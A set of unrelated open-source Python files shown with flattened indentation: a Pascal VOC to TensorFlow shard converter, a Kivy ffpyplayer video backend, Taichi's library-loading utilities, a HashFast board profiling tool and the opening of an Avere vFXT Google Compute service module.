all_splits: list of strings, sub-path to the data set.
num_shards: integer number of shards for this data set.
"""
all_records = []
for split in all_splits:
main_path = os.path.join(directory, split, 'ImageSets/Main')
jpeg_lst = []
for cls in dataset_common.VOC_LABELS_reduced:
if cls not in ['none', 'background']:
if "test" in split.lower():
cls_im_lst = os.path.join(main_path, cls + '_test.txt')
else:
cls_im_lst = os.path.join(main_path, cls + '_trainval.txt')
with open(cls_im_lst, 'r') as f:
for line in f:
if line.split(" ")[0] + ".jpg" not in jpeg_lst:
jpeg_lst.append(line.split(" ")[0] + ".jpg")
f.close()
jpegs = [im_name for im_name in jpeg_lst if im_name.strip()[-3:]=='jpg']
all_records.extend(list(zip([split] * len(jpegs), jpegs)))
shuffled_index = list(range(len(all_records)))
random.seed(RANDOM_SEED)
random.shuffle(shuffled_index)
all_records = [all_records[i] for i in shuffled_index]
_process_image_files(name, directory, all_records, num_shards)
def parse_comma_list(args):
return [s.strip() for s in args.split(',')]
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('val', FLAGS.dataset_directory, parse_comma_list(FLAGS.validation_splits), FLAGS.validation_shards)
_process_dataset('train', FLAGS.dataset_directory, parse_comma_list(FLAGS.train_splits), FLAGS.train_shards)
if __name__ == '__main__':
tf.app.run()
|
video_ffpyplayer.py
|
'''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL2.
Now, you should have ffmpeg and sdl directories. In each, you should have an
'include', 'bin' and 'lib' directory, where e.g. for Windows, 'lib' contains
the .dll.a files, while 'bin' contains the actual dlls. The 'include' directory
holds the headers. The 'bin' directory is only needed if the shared libraries
are not already in the path. In the environment, define FFMPEG_ROOT and
SDL_ROOT, each pointing to the ffmpeg and SDL directories respectively. (If
you're using SDL2, the 'include' directory will contain an 'SDL2' directory,
which then holds the headers).
Once defined, download the ffpyplayer git repo and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
..Note::
When kivy exits by closing the window while the video is playing,
it appears that the __del__method of VideoFFPy
is not called. Because of this, the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
flag set, when the main threads exists, it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive, hanging kivy. What
this means is that you have to be sure to delete the MediaPlayer object
before kivy exits by setting it to None.
'''
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size,
colorfmt='rgba')
# XXX FIXME
# self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
if dy and du and dv:
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader
# for buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
s = time.clock()
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
# XXX if will fail later then?
if time.clock() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
# we got all the informations, now, get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
seek_happened = False
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
percent, precise = vals[-1]
ffplayer.seek(
percent * ffplayer.get_metadata()['duration'],
relative=False,
accurate=precise
)
seek_happened = True
self._next_frame = None
# Get next frame if paused:
if seek_happened and ffplayer.get_pause():
ffplayer.set_volume(0.0) # Try to do it silently.
ffplayer.set_pause(False)
try:
# We don't know concrete number of frames to skip,
# this number worked fine on couple of tested videos:
to_skip = 6
while True:
frame, val = ffplayer.get_frame(show=False)
# Exit loop on invalid val:
if val in ('paused', 'eof'):
break
# Exit loop on seek_queue updated:
if seek_queue:
break
# Wait for next frame:
if frame is None:
sleep(0.005)
continue
# Wait until we skipped enough frames:
to_skip -= 1
if to_skip == 0:
break
# Assuming last frame is actual, just get it:
frame, val = ffplayer.get_frame(force_refresh=True)
finally:
ffplayer.set_pause(bool(self._state == 'paused'))
ffplayer.set_volume(self._volume)
# Get next frame regular:
else:
frame, val = ffplayer.get_frame()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent, precise=True):
if self._ffplayer is None:
return
self._seek_queue.append((percent, precise,))
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt,
'sn': True,
'volume': self._volume,
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
# Disabled as an attempt to fix kivy issue #6210
# self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False
|
util.py
|
import os
import re
import shutil
import sys
import ctypes
from pathlib import Path
from colorama import Fore, Back, Style
from .settings import *
if sys.version_info[0] < 3 or sys.version_info[1] <= 5:
raise RuntimeError(
"\nPlease restart with Python 3.6+\n" + "Current Python version:",
sys.version_info)
ti_core = None
def in_docker():
if os.environ.get("TI_IN_DOCKER", "") == "":
return False
else:
return True
def import_ti_core(tmp_dir=None):
global ti_core
if get_os_name() != 'win':
old_flags = sys.getdlopenflags()
sys.setdlopenflags(2 | 8) # RTLD_NOW | RTLD_DEEPBIND
else:
pyddir = os.path.join(package_root(), 'lib')
os.environ['PATH'] += ';' + pyddir
try:
import taichi_core as core
except Exception as e:
if isinstance(e, ImportError):
print(
Fore.YELLOW + "Share object taichi_core import failed, "
"check this page for possible solutions:\n"
"https://taichi.readthedocs.io/en/stable/install.html#troubleshooting"
+ Fore.RESET)
if get_os_name() == 'win':
e.msg += '\nConsider installing Microsoft Visual C++ Redistributable: https://aka.ms/vs/16/release/vc_redist.x64.exe'
elif get_os_name() == 'linux':
e.msg += '\nConsider installing libtinfo5: sudo apt-get install libtinfo5'
raise e from None
ti_core = core
if get_os_name() != 'win':
sys.setdlopenflags(old_flags)
lib_dir = os.path.join(package_root(), 'lib')
core.set_lib_dir(locale_encode(lib_dir))
if tmp_dir is not None:
core.set_tmp_dir(locale_encode(tmp_dir))
def locale_encode(path):
try:
import locale
return path.encode(locale.getdefaultlocale()[1])
except:
try:
import sys
return path.encode(sys.getfilesystemencoding())
except:
try:
return path.encode()
except:
return path
def is_ci():
return os.environ.get('TI_CI', '') == '1'
def package_root():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')
def is_release():
return os.environ.get('TAICHI_REPO_DIR', '') == ''
def get_core_shared_object():
if is_release():
directory = os.path.join(package_root(), 'lib')
else:
directory = get_bin_directory()
return os.path.join(directory, 'libtaichi_core.so')
def get_repo():
from git import Repo
repo = Repo(get_repo_directory())
return repo
def print_red_bold(*args, **kwargs):
print(Fore.RED + Style.BRIGHT, end='')
print(*args, **kwargs)
print(Style.RESET_ALL, end='')
create_sand_box_on_windows = True
def build():
tmp_cwd = os.getcwd()
bin_dir = get_build_directory()
try:
os.mkdir(bin_dir)
except:
pass
os.chdir(bin_dir)
import multiprocessing
print('Building taichi...')
num_make_threads = min(20, multiprocessing.cpu_count())
if get_os_name() == 'win':
make_ret = os.system(
"msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln")
else:
make_ret = os.system('make -j {}'.format(num_make_threads))
if make_ret != 0:
print(' Error: Build failed.')
exit(-1)
os.chdir(tmp_cwd)
def check_exists(src):
if not os.path.exists(src):
raise FileNotFoundError(
f'File "{src}" not exist. Installation corrupted or build incomplete?'
)
def prepare_sandbox():
'''
Returns a temporary directory, which will be automatically deleted on exit.
It may contain the taichi_core shared object or some misc. files.
'''
import atexit
import shutil
from tempfile import mkdtemp
tmp_dir = mkdtemp(prefix='taichi-')
atexit.register(shutil.rmtree, tmp_dir)
print(f'[Taichi] preparing sandbox at {tmp_dir}')
os.mkdir(os.path.join(tmp_dir, 'runtime/'))
return tmp_dir
def get_unique_task_id():
import datetime
import random
return datetime.datetime.now().strftime('task-%Y-%m-%d-%H-%M-%S-r') + (
'%05d' % random.randint(0, 10000))
if is_release():
print("[Taichi] mode=release")
sys.path.append(os.path.join(package_root(), 'lib'))
if get_os_name() != 'win':
link_src = os.path.join(package_root(), 'lib', 'taichi_core.so')
link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so')
# For llvm jit to find the runtime symbols
if not os.path.exists(link_dst):
os.symlink(link_src, link_dst)
import_ti_core()
if get_os_name() != 'win':
dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_LOCAL)
# The C backend needs a temporary directory for the generated .c and compiled .so files:
ti_core.set_tmp_dir(locale_encode(prepare_sandbox(
))) # TODO: always allocate a tmp_dir for all situations
ti_core.set_python_package_dir(package_root())
os.makedirs(ti_core.get_repo_dir(), exist_ok=True)
else:
print("[Taichi] mode=development")
if get_os_name() == 'osx':
bin_dir = get_bin_directory()
os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory()
lib_path = os.path.join(bin_dir, 'libtaichi_core.dylib')
tmp_cwd = os.getcwd()
tmp_dir = prepare_sandbox()
check_exists(lib_path)
shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so'))
os.chdir(tmp_dir)
sys.path.append(tmp_dir)
import taichi_core as ti_core
os.chdir(tmp_cwd)
# TODO: unify importing infrastructure:
elif get_os_name() == 'linux':
bin_dir = get_bin_directory()
if 'LD_LIBRARY_PATH' in os.environ:
os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/'
else:
os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/'
lib_path = os.path.join(bin_dir, 'libtaichi_core.so')
check_exists(lib_path)
tmp_cwd = os.getcwd()
tmp_dir = prepare_sandbox()
check_exists(lib_path)
shutil.copy(lib_path, os.path.join(tmp_dir, 'taichi_core.so'))
os.chdir(tmp_dir)
sys.path.append(tmp_dir)
try:
import_ti_core(tmp_dir)
except Exception as e:
from colorama import Fore, Back, Style
print_red_bold("Taichi core import failed: ", end='')
print(e)
print(
Fore.YELLOW + "check this page for possible solutions:\n"
"https://taichi.readthedocs.io/en/stable/install.html#troubleshooting"
+ Fore.RESET)
raise e from None
os.chdir(tmp_cwd)
elif get_os_name() == 'win':
bin_dir = get_bin_directory()
dll_path_invalid = os.path.join(bin_dir, 'libtaichi_core.dll')
assert not os.path.exists(dll_path_invalid)
possible_folders = ['Debug', 'RelWithDebInfo', 'Release']
detected_dlls = []
for folder in possible_folders:
dll_path = os.path.join(bin_dir, folder, 'taichi_core.dll')
if os.path.exists(dll_path):
detected_dlls.append(dll_path)
if len(detected_dlls) == 0:
raise FileNotFoundError(
f'Cannot find Taichi core dll under {get_bin_directory()}/{possible_folders}'
)
elif len(detected_dlls) != 1:
print('Warning: multiple Taichi core dlls found:')
for dll in detected_dlls:
print(' ', dll)
print(f'Using {detected_dlls[0]}')
dll_path = detected_dlls[0]
# On windows when an dll/pyd is loaded, we cannot write to it any more
old_wd = os.getcwd()
os.chdir(bin_dir)
if create_sand_box_on_windows:
# Create a sandbox for separated core lib development and loading
folder = os.path.join(get_output_directory(), 'tmp',
get_unique_task_id())
lib_dir = os.path.join(get_repo_directory(), 'external', 'lib')
os.environ['PATH'] += ';' + lib_dir
os.makedirs(folder)
shutil.copy(dll_path, os.path.join(folder, 'taichi_core.pyd'))
os.environ['PATH'] += ';' + folder
sys.path.append(folder)
else:
shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd'))
sys.path.append(bin_dir)
try:
import taichi_core as ti_core
except Exception as e:
print(e)
print()
print(
'Hint: please make sure the major and minor versions of the Python executable is correct.'
)
print()
raise e
os.chdir(old_wd)
log_level = os.environ.get('TI_LOG_LEVEL', '')
if log_level:
ti_core.set_logging_level(log_level)
def get_dll_name(name):
if get_os_name() == 'linux':
return 'libtaichi_%s.so' % name
elif get_os_name() == 'osx':
return 'libtaichi_%s.dylib' % name
elif get_os_name() == 'win':
return 'taichi_%s.dll' % name
else:
raise Exception(f"Unknown OS: {get_os_name()}")
def load_module(name, verbose=True):
if verbose:
print('Loading module', name)
try:
if get_os_name() == 'osx':
mode = ctypes.RTLD_LOCAL
else:
mode = ctypes.RTLD_GLOBAL
if '.so' in name:
ctypes.PyDLL(name, mode=mode)
else:
ctypes.PyDLL(os.path.join(get_repo_directory(), 'build',
get_dll_name(name)),
mode=mode)
except Exception as e:
print(Fore.YELLOW +
"Warning: module [{}] loading failed: {}".format(name, e) +
Style.RESET_ALL)
def at_startup():
if not is_release():
output_dir = get_output_directory()
if not os.path.exists(output_dir):
print('Making output directory')
os.mkdir(output_dir)
ti_core.set_core_state_python_imported(True)
def start_memory_monitoring(output_fn, pid=-1, interval=1):
# removing dependency on psutil
return
import os, psutil, time
if pid == -1:
pid = os.getpid()
import multiprocessing
def task():
with open(output_fn, 'w') as f:
process = psutil.Process(pid)
while True:
try:
mem = process.memory_info().rss
except:
mem = -1
time.sleep(interval)
print(time.time(), mem, file=f)
f.flush()
proc = multiprocessing.Process(target=task, daemon=True)
proc.start()
def require_version(major, minor=None, patch=None):
versions = [
int(ti_core.get_version_major()),
int(ti_core.get_version_minor()),
int(ti_core.get_version_patch()),
]
match = major == versions[0] and (
minor < versions[1] or minor == versions[1] and patch <= versions[2])
if match:
return
else:
print("Taichi version mismatch. required >= {}.{}.{}".format(
major, minor, patch))
print("Installed =", ti_core.get_version_string())
raise Exception("Taichi version mismatch")
at_startup()
def _print_taichi_header():
dev_mode = not is_release()
header = '[Taichi] '
if dev_mode:
header += '<dev mode>, '
else:
header += f'version {ti_core.get_version_string()}, '
llvm_version = ti_core.get_llvm_version_string()
header += f'llvm {llvm_version}, '
commit_hash = ti_core.get_commit_hash()
commit_hash = commit_hash[:8]
header += f'commit {commit_hash}, '
header += f'{get_os_name()}, '
py_ver = '.'.join(str(x) for x in sys.version_info[:3])
header += f'python {py_ver}'
print(header)
_print_taichi_header()
__all__ = [
'ti_core',
'build',
'load_module',
'start_memory_monitoring',
'is_release',
'package_root',
'require_version',
]
|
profiler.py
|
#! /usr/bin/env python3
# Copyright (c) 2014, HashFast Technologies LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of HashFast Technologies LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL HASHFAST TECHNOLOGIES LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='Profile HashFast boards in order to find optimal operating points.')
parser.add_argument('-r', '--revision', dest='revision', type=int, default=3, help='HashFast board major revision number')
return parser.parse_args()
if __name__ == '__main__':
# parse args before other imports
args = parse_args()
if args.revision is 3:
FRQ_MIN = 925
VLT_MIN = 900
else:
FRQ_MIN = 500
VLT_MIN = 720
# frequency steps
FRQ_STEP = 25
# voltage steps
VLT_STEP = 5
import sys
import time
import threading
import csv
from collections import OrderedDict
from abc import ABCMeta, abstractmethod
from datetime import datetime
from hf.ui.base import BaseUI
from hf.load import hf
from hf.load import talkusb
from hf.load.routines import settings
from hf.load.routines import thermal
from hf.usb import usbbulk
from hf.usb import usbctrl
fn = OrderedDict([('die',None),('frequency',None),('voltage',None),('hashrate',None),('hashes',None),('jobs',None),('nonces',None),
('lhw',None),('dhw',None),('chw',None),('temperature',None),('core_voltage',None),('thermal_cutoff',None),('elapsed',None)])
class HFProfilerData:
def __init__(self):
pass
class HFProfilerBase(object):
def __init__(self):
pass
class HFProfilerInteractive(HFProfilerBase):
def __init__(self):
self.frequency = [None]*4
self.voltage = [None]*4
self.csvfilename = 'profiler_{}.csv'.format(int(time.time()))
with open(self.csvfilename, 'w') as csvfile:
csvwriter = csv.DictWriter(csvfile, fn, extrasaction='ignore')
csvwriter.writeheader()
def start(self, ui, dev):
talkusb.talkusb(hf.INIT, None, 0);
self.test(ui, dev)
def test(self, ui, dev):
option = ui.prompt_int_single("Option? 0=PROM 1=DEFAULTS")
if option is 1:
self.frequency = [FRQ_MIN]*4
self.voltage = [VLT_MIN]*4
while True:
try:
time.sleep(1)
# do settings for this round
self.set(ui)
# wait for settings to be applied
time.sleep(3)
# run test
self.run(ui, dev, option)
for x in range(4):
do = ui.prompt_int_single("Die {}? 0:SAME 1:VU 2:VD 3:FU 4:FD".format(x+1))
if do is 1:
self.voltage[x] += VLT_STEP
elif do is 2:
self.voltage[x] -= VLT_STEP
elif do is 3:
self.frequency[x] += FRQ_STEP
elif do is 4:
self.frequency[x] -= FRQ_STEP
else:
return 0
except KeyboardInterrupt:
ui.log("exiting")
ui.end()
return
except:
ui.log("Error")
def set(self, ui):
ui.prompt_show("Updating Die Settings")
talkusb.talkusb(hf.INIT, None, 0)
setter = settings.SettingsRoutine(talkusb.talkusb, 1, ui.log)
for x in range(4):
frq = self.frequency[x]
vlt = self.voltage[x]
if frq is None or vlt is None:
return None
else:
setter.setup(x, frq, vlt)
# run
rslt = True
while rslt:
rslt = setter.one_cycle()
# wait for settings to be applied
time.sleep(3)
def vset(self, ui, dev):
for x in range(4):
vlt = self.voltage[x]
dev.voltage_set(0, x, vlt)
time.sleep(0.1)
def run(self, ui, dev, option):
talkusb.talkusb(hf.INIT, None, 0)
self.test = thermal.ThermalRoutine(talkusb.talkusb, 1, ui.log, deterministic=True)
ui.prompt_show("Running option "+str(option)+". Press board 'RESET' or ctrl+c to end.")
self.cr = ui.current_round
self.cr.clockrate = option
rslt = True
# thread
thread = threading.Thread(target=self.monitor_temp, args={ui})
self.running = True
#thread.daemon = True
thread.start()
# run
while rslt:
rslt = self.test.one_cycle()
if self.req_stop is True:
self.test.end()
rslt = False
# record current voltage and frequency
for x in range(4):
if self.test.dies[x] is not None:
die = self.test.dies[x]
if die['voltage'] is not None:
self.voltage[x] = die['voltage']
if die['frequency'] is not None:
self.frequency[x] = die['frequency']
# write logfile
with open(self.csvfilename, 'a') as csvfile:
csvwriter = csv.DictWriter(csvfile, fn, extrasaction='ignore')
for x in range(4):
if self.test.dies[x] is not None:
die = self.test.dies[x]
csvwriter.writerow(die)
#if rslt is -2:
# self.run(ui, dev, clockrate)
# cycle loop complete
#ui.prompt_enter("Round Complete. Check temperature.")
self.running = False
# wait for board to reset
time.sleep(3)
def monitor_temp(self, ui):
runtime = 0
self.req_stop = False
while self.running:
time.sleep(0.5)
runtime += 0.5
if runtime > 180: # three minutes
self.req_stop = True
self.cr.total_hashes = self.test.stats['hashes']
self.cr.total_errors = self.test.stats['lhw']
self.cr.hash_rate = self.test.stats['hashrate']
self.cr.stats = self.test.stats
if self.test.dies is not None:
for dinfo in ui.die_info:
if dinfo is not None:
die = self.test.dies[dinfo.index]
if die is not None:
dinfo.die = die
if self.voltage[dinfo.index] is not None:
die['voltage'] = self.voltage[dinfo.index]
dinfo.thermal_cutoff = die['thermal_cutoff']
dinfo.active = die['active']
dinfo.pending = die['pending']
dinfo.temp = die['temperature']
dinfo.vm = die['core_voltage']
def input(self, msg):
pass
class HFProfilerUI(BaseUI):
def setup_ui(self):
# column 0
self.setup_log( 0, 0, w=4)
# column 4
self.setup_logo( 4, 1, "HashFast Profiling Tool", "v0.1")
self.setup_input( 4, 8 )
self.setup_output( 4, 12)
self.setup_expmodule( 4, 16, coremap=0)
self.setup_stats( 4, 42)
# column 9
self.setup_info( 9, 1 )
def update_ui(self):
self.update_module()
self.update_expmodule()
self.update_info()
self.update_current()
def refresh_ui(self):
pass
def main(args):
ui = HFProfilerUI()
try:
ui.setup()
ui.refresh()
ui.prompt_show("Please connect device.")
dev = usbctrl.poll_hf_ctrl_device(printer=ui.log)
ret = ui.prompt("HashFast Profiling Tool. Press 's' to start", "s")
if ret:
profiler = HFProfilerInteractive()
profiler.start(ui, dev)
finally:
ui.end()
if __name__ == "__main__":
main(args)
|
gce.py
|
# Copyright (c) 2015-2020 Avere Systems, Inc. All Rights Reserved.
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root for license information.
''' Abstraction for doing things on instances via Google Compute
Cookbook/examples:
# With JSON key file provided by Google service account
gce = vFXT.gce.Service(network, zone, key_file=path_to_json)
# or with a P12 key file provided by Google service account
gce = vFXT.gce.Service(network, zone, client_email, project, key_file=path_to_p12)
# or if on a GCE compute instance, we can autodetect service account and settings
gce = vFXT.gce.Service.on_instance_init()
# Connection factory, has a thread specific copy
connection = gce.connection()
compute_conn = gce.connection(connection_type='compute')
storage_conn = gce.connection(connection_type='storage')
instances = gce.find_instances('') # filter string
instances = gce.get_instances([])
instance = gce.get_instance('instance id')
gce.start(instance)
gce.stop(instance)
gce.restart(instance)
gce.destroy(instance)
gce.shelve(instance)
gce.unshelve(instance)
instance = gce.refresh(instance)
print(gce.name(instance))
print(gce.ip(instance))
print(gce.fqdn(instance))
print(gce.status(instance))
if gce.is_on(instance): pass
if gce.is_off(instance): pass
if gce.is_shelved(instance): pass
gce.wait_for_status(instance, gce.ON_STATUS, retries=gce.WAIT_FOR_STATUS)
gce.create_instance(machine_type, name, boot_disk_image, other_disks=None, **options)
gce.create_cluster(self, cluster, **options)
gce.create_bucket(name)
gce.delete_bucket(name)
gce.load_cluster_information(cluster)
ip_count = 12
ip_addresses, mask = gce.get_available_addresses(count=ip_count, contiguous=True)
gce.get_dns_servers()
gce.get_ntp_servers()
gce.get_default_router()
serializeme = gce.export()
newgce = vFXT.gce.Service(**serializeme)
'''
import base64
from builtins import range #pylint: disable=redefined-builtin
from future.utils import viewitems, raise_from
import http.client
import httplib2
import httplib2.socks
import ssl
import logging
import time
import threading
import queue as Queue
import json
import socket
import re
import os
import uuid
import filecmp
from itertools import cycle
import pkg_resources
import googleapiclient.discovery
import oauth2client.client #pylint: disable=unused-import
import googleapiclient
logging.getLogger('googleapiclient').setLevel(logging.CRITICAL)
from vFXT.cidr import Cidr
from vFXT.serviceInstance import ServiceInstance
from vFXT.service import vFXTServiceTimeout, vFXTServiceConnectionFailure, vFXTServiceFailure, vFXTServiceMetaDataFailure, vFXTConfigurationException, vFXTCreateFailure, vFXTNodeExistsException, ShelveErrors, ServiceBase, backoff, load_defaults, CONNECTION_TIMEOUT
log = logging.getLogger(__name__)
class Service(ServiceBase):
'''GCE Service backend'''
ON_STATUS = "RUNNING"
OFF_STATUS = "TERMINATED"
NTP_SERVERS = ['169.254.169.254']
DNS_SERVERS = ['169.254.169.254']
GCE_URL = "https://www.googleapis.com/compute/v1/projects"
GCE_INSTANCE_HOST = '169.254.169.254'
CONTROL_ADDR = None
MACHINE_DEFAULTS = {
'f1-micro': {'data_disk_size': 200, 'data_disk_type': 'pd-standard', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-standard'},
'g1-small': {'data_disk_size': 200, 'data_disk_type': 'pd-standard', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-standard'},
'n1-highcpu-2': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-4': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-8': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
